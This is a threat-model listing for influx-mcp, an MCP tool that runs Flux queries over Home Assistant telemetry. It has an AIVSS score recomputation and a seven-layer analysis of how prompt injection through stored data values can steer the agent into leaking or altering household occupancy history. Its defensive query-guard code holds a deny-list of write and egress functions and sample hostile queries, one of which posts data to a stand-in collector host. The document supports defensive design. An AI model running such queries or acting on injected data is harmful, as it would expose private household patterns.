AgentReadyHome · Agent Listing


influx-mcp — agentic threat model

AIVSS 8.4 · High

influx-mcp presents a high-risk profile: it executes arbitrary Flux queries over sensitive Home Assistant telemetry, so any prompt injection that reaches it can be turned into a query that exposes private household patterns (presence, activity and device history), and the only hard limit on what a generated query can do is the permission of the InfluxDB token behind the tool.

OWASP AIVSS score rationale

AIVSS = (CVSS_Base + AARS) × Mitigation_Factor, where AARS = (10 − CVSS_Base) × (Factor_Sum / 10) × ThM
CVSS base: 7.5
AARS uplift: 0.94
Factor sum: 3.6 / 10
Threat multiplier (ThM): ×1.05
Mitigation factor: ×1.0

Agentic risk factors (each scored 0.0 to 1.0; they sum to 3.6):
Autonomy of Action: 0.40
Goal-Driven Planning: 0.30
Self-Modification: 0.00
Dynamic Tool Use: 0.80
Persistent Memory: 0.20
Contextual Awareness: 0.60
Dynamic Identity: 0.10
Multi-Agent Interactions: 0.30
Non-Determinism: 0.50
Opacity & Reflexivity: 0.40

Scored with the canonical OWASP AIVSS formula (AIVSS calculator reference); agentic risk factors estimated from the agent’s described capabilities.
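The score block above, recomputed from the page's own formula and factor table. This is an added example, not part of the listing and not the OWASP calculator's code; the formula, CVSS base, factor values, ThM and mitigation factor are all taken from the page, while the severity bands (assumed to be the CVSS v3.x qualitative ratings) and the two what-if inputs at the end (a 0.8 mitigation factor, a Dynamic Tool Use of 0.20) are hypothetical. Decimal arithmetic is used so that intermediate values such as 0.945 are carried exactly before the one-decimal rounding the page reports.

```python
"""Recompute the AIVSS score from the components shown on this page."""
from decimal import Decimal, ROUND_HALF_EVEN

# Agentic risk factors exactly as listed for influx-mcp (each 0.0 to 1.0).
FACTORS = {
    "Autonomy of Action": "0.40",
    "Goal-Driven Planning": "0.30",
    "Self-Modification": "0.00",
    "Dynamic Tool Use": "0.80",
    "Persistent Memory": "0.20",
    "Contextual Awareness": "0.60",
    "Dynamic Identity": "0.10",
    "Multi-Agent Interactions": "0.30",
    "Non-Determinism": "0.50",
    "Opacity & Reflexivity": "0.40",
}
CVSS_BASE = Decimal("7.5")
THREAT_MULTIPLIER = Decimal("1.05")   # ThM on the page
MITIGATION_FACTOR = Decimal("1.0")    # the page credits no mitigations


def _d(x) -> Decimal:
    """Decimal arithmetic keeps 0.945 as 0.945; binary floats would not."""
    return x if isinstance(x, Decimal) else Decimal(str(x))


def _q(x: Decimal, places: str) -> Decimal:
    return x.quantize(Decimal(places), rounding=ROUND_HALF_EVEN)


def factor_sum(factors=FACTORS) -> Decimal:
    return sum((_d(v) for v in factors.values()), Decimal(0))


def aars(cvss_base=CVSS_BASE, factors=FACTORS, thm=THREAT_MULTIPLIER) -> Decimal:
    """AARS = (10 - CVSS_Base) * (Factor_Sum / 10) * ThM, unrounded."""
    return (Decimal(10) - _d(cvss_base)) * (factor_sum(factors) / Decimal(10)) * _d(thm)


def aivss(cvss_base=CVSS_BASE, factors=FACTORS, thm=THREAT_MULTIPLIER,
          mitigation=MITIGATION_FACTOR) -> Decimal:
    """AIVSS = (CVSS_Base + AARS) * Mitigation_Factor, reported to one decimal."""
    return _q((_d(cvss_base) + aars(cvss_base, factors, thm)) * _d(mitigation), "0.1")


def severity(score: Decimal) -> str:
    """Assumption: AIVSS reuses the CVSS v3.x qualitative bands."""
    if score == 0:
        return "None"
    if score < Decimal("4.0"):
        return "Low"
    if score < Decimal("7.0"):
        return "Medium"
    if score < Decimal("9.0"):
        return "High"
    return "Critical"


def score_card(factors=FACTORS, thm=THREAT_MULTIPLIER, mitigation=MITIGATION_FACTOR) -> dict:
    """The figures the listing's score block shows, as plain floats."""
    total = aivss(CVSS_BASE, factors, thm, mitigation)
    return {
        "cvss_base": float(CVSS_BASE),
        "factor_sum": float(factor_sum(factors)),
        "aars": float(_q(aars(CVSS_BASE, factors, thm), "0.01")),
        "aivss": float(total),
        "severity": severity(total),
    }


if __name__ == "__main__":
    print("as listed:      ", score_card())
    # Hypothetical what-if: crediting mitigations (read-only bucket-scoped
    # token plus a query validator) with a 0.8 mitigation factor. The 0.8
    # is illustrative, not a value from the page or from OWASP.
    print("mitigation 0.8: ", score_card(mitigation="0.8"))
    # Hypothetical what-if: a query allow-list that removes most of the
    # Dynamic Tool Use exposure (0.80 -> 0.20), everything else unchanged.
    print("tool use 0.20:  ", score_card(factors={**FACTORS, "Dynamic Tool Use": "0.20"}))
```

The two what-ifs show where the score is sensitive: because AARS is scaled by (10 − CVSS_Base), a 7.5 base leaves only 2.5 points of agentic uplift, so halving the factor sum moves the score by a few tenths, whereas the mitigation factor multiplies the whole total and drops it a full band.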

MAESTRO 7-layer threat model

Per-layer threats for this agent. Layers tagged “not certain from listing” are general, caveated commentary where the public description didn’t pin that layer.

L1 · Foundation Models [⚠ not certain from listing]

Not certain from the listing: the underlying foundation model is not specified. Whatever model drives the agent is exposed to indirect prompt injection through the data it reads back. Free-text values recorded in InfluxDB (an entity or device name, a text sensor's state, an attribute string) come back as ordinary query rows, and a model that treats those rows as instructions rather than data can be steered mid-task. The injection lands when results are fed back to the model, not while InfluxDB executes the query, so the defence has to cover the result path as well as the query path.

L2 · Data Operations [✓ mapped]

The agent directly queries InfluxDB 2.x time-series buckets. The primary threat is exfiltration of sensitive IoT/Home Assistant telemetry: presence, door, motion and power history is, in effect, an occupancy record of the household. The secondary threat is data poisoning: anything able to write an entity state that Home Assistant records (a compromised device or integration, for example) can plant crafted values that the agent later reads back and acts on.

L3 · Agent Frameworks [✓ mapped]

The tool surface is arbitrary Flux query execution, which is a severe tool-misuse exposure: a manipulated LLM can be made to run queries that read buckets outside the intended scope or, because Flux is not read-only (to() writes rows back, and packages such as http can push data out), queries that alter or leak data. Without a query validator in front of the tool, the token's permissions are the only limit on what a generated query can do.

L4 · Deployment & Infrastructure [✓ mapped]

The agent holds an InfluxDB access token. If the hosting environment (e.g., the Home Assistant supervisor or a local container) is compromised, that token can be read out and used directly against the database, bypassing the MCP tool surface entirely.

L5 · Evaluation & Observability [⚠ not certain from listing]

Not certain from the listing: there is no mention of built-in guardrails, query validation, or logging. Without a per-call record of the exact Flux text sent to InfluxDB, neither a blocked query nor an anomalous one (an unusual bucket, lookback window or row volume) can be detected, during the session or after it.

L6 · Security & Compliance (cross-cutting) [✓ mapped]

The agent has no authorization layer of its own: any agent or user that can reach the MCP server inherits the full permissions of the underlying InfluxDB token, violating the principle of least privilege. The check that matters is therefore what that token can do. A token created read-only and scoped to the single Home Assistant bucket bounds the damage of any injected query to reading that bucket; an all-access or operator token does not.
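A pre-execution guard of the kind the L3, L5 and L6 entries call for, written here as an added Python example; it is not influx-mcp's own code. It assumes a hypothetical policy: one allow-listed bucket named home_assistant, a 30-day lookback cap, a 4000-character limit, and an import allow-list of pure helper packages; the sample queries are constructed. Two details matter for evasion: the pass is string-aware, because a naive comment stripper treats the `//` inside a URL literal as a comment and hides everything after it, and forbidden functions are matched as bare identifiers rather than as `name(`, because Flux lets a query bind `to` to another name before calling it.

```python
"""Pre-execution guard for LLM-generated Flux queries (added example)."""
import re

ALLOWED_BUCKETS = frozenset({"home_assistant"})                     # hypothetical bucket
ALLOWED_IMPORTS = frozenset({"strings", "math", "date", "regexp"})  # pure helpers only
MAX_QUERY_CHARS = 4000                                              # hypothetical limit
MAX_LOOKBACK_SECONDS = 30 * 24 * 3600                               # hypothetical: 30 days

# Matched as bare identifiers so that "w = to" followed by "w(...)" is still caught.
# to / experimental.to / sql.to / mqtt.to write or forward rows; http.post and
# requests.* are network egress; buckets / v1.databases / schema.* enumerate
# the instance instead of reading one bucket.
_FORBIDDEN = re.compile(
    r"(?<![\w.])(?:to|buckets|experimental\.to|sql\.to|mqtt\.to|http\.post"
    r"|requests\.(?:do|get|post)|v1\.databases|schema\.\w+)\b"
)
# One string-aware pass: "//" inside a string literal is not a comment, and a
# quote inside a comment does not open a string. Flux regex literals (/.../)
# are not tokenized here; a real deployment should check the parsed AST.
_TOKEN = re.compile(r'"(?:[^"\\]|\\.)*"|//[^\n]*')
_IMPORT = re.compile(r'\bimport\s+"([^"]*)"')
_FROM = re.compile(r"\bfrom\s*\(([^)]*)\)")
_BUCKET_ARG = re.compile(r'^\s*bucket\s*:\s*"([^"]*)"\s*$')   # exactly one literal arg
_RANGE_START = re.compile(r"\brange\s*\([^)]*\bstart\s*:\s*(-\d+(?:ms|s|m|h|d|w|mo|y))\b")
_DURATION = re.compile(r"^-(\d+)(ms|s|m|h|d|w|mo|y)$")
_UNIT_SECONDS = {"ms": 0.001, "s": 1, "m": 60, "h": 3600, "d": 86400,
                 "w": 604800, "mo": 30 * 86400, "y": 365 * 86400}


def _strip(query: str, strings_too: bool) -> str:
    """Drop comments; optionally blank string bodies as well."""
    def repl(m):
        tok = m.group(0)
        if tok.startswith("//"):
            return ""
        return '""' if strings_too else tok
    return _TOKEN.sub(repl, query)


def check_flux(query: str) -> list[str]:
    """Return every policy violation found in `query`; an empty list means allow."""
    problems: list[str] = []
    if len(query) > MAX_QUERY_CHARS:
        problems.append(f"query exceeds {MAX_QUERY_CHARS} characters")
    code = _strip(query, strings_too=False)   # comments gone, strings kept (for bucket names)
    names = _strip(query, strings_too=True)   # comments and string bodies gone (for identifiers)

    for pkg in _IMPORT.findall(code):
        if pkg not in ALLOWED_IMPORTS:
            problems.append(f"import of {pkg!r} not allowed")
    for hit in sorted(set(_FORBIDDEN.findall(names))):
        problems.append(f"forbidden function {hit!r}")

    froms = _FROM.findall(code)
    if not froms:
        problems.append("no from() call")
    for args in froms:
        m = _BUCKET_ARG.match(args)   # also rejects from(bucket:..., host:..., token:...)
        if m is None:
            problems.append('from() must take exactly bucket: "<literal>"')
        elif m.group(1) not in ALLOWED_BUCKETS:
            problems.append(f"bucket {m.group(1)!r} not allowed")

    m = _RANGE_START.search(names)
    if m is None:
        problems.append("range(start: -<duration>) required")
    else:
        count, unit = _DURATION.match(m.group(1)).groups()
        if int(count) * _UNIT_SECONDS[unit] > MAX_LOOKBACK_SECONDS:
            problems.append(f"lookback {m.group(1)} exceeds policy")
    return problems


def is_allowed(query: str) -> bool:
    return not check_flux(query)


# Constructed sample queries, not captured traffic.
SAMPLES = {
    "ok_room_temperature": (
        'from(bucket: "home_assistant")\n'
        '  |> range(start: -24h)  // last day only\n'
        '  |> filter(fn: (r) => r.entity_id == "living_room_temperature")\n'
        '  |> aggregateWindow(every: 1h, fn: mean)'
    ),
    "write_via_to": 'from(bucket: "home_assistant") |> range(start: -1h)\n  |> to(bucket: "home_assistant")',
    "egress_via_http": (
        'import "http"\n'
        'from(bucket: "home_assistant") |> range(start: -1h)\n'
        '  |> map(fn: (r) => ({r with sent: http.post(url: "http://collector.invalid/",'
        ' data: bytes(v: string(v: r._value)))}))'
    ),
    "enumerate_buckets": "buckets()",
    "other_bucket": 'from(bucket: "secrets") |> range(start: -1h)',
    "year_of_presence": 'from(bucket: "home_assistant") |> range(start: -1y)',
    "hidden_behind_url_literal": (
        'from(bucket: "home_assistant") |> range(start: -1h)\n'
        '  |> filter(fn: (r) => r.url == "http://x") |> to(bucket: "home_assistant")'
    ),
}

if __name__ == "__main__":
    for name, q in SAMPLES.items():
        verdict = check_flux(q)
        print(f"{name:28} {'ALLOW' if not verdict else 'DENY: ' + '; '.join(verdict)}")
```

Run it to print a verdict per sample. The guard is the second layer: the first is an InfluxDB 2.x token granted read permission on that one bucket only, which bounds what any query can do even if the guard is bypassed, and the third (the L5 gap) is logging the exact Flux text at the point where it is rejected or forwarded. Regexes are the wrong long-term parser for Flux; a deployed guard should apply the same policy to the query's AST, which InfluxDB 2.x can return through its query API, rather than to the raw text.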

L7 · Agent Ecosystem [✓ mapped]

As an MCP server, influx-mcp is designed to be called by orchestrator agents. This cascades risk: a compromised or injected upstream agent gets the same query capability and can pull the recorded history of every device in the bucket, a record of who is home and when, rather than only the single entity the user asked about.

MAESTRO — the 7-layer agentic threat-modeling framework (Cloud Security Alliance / Ken Huang).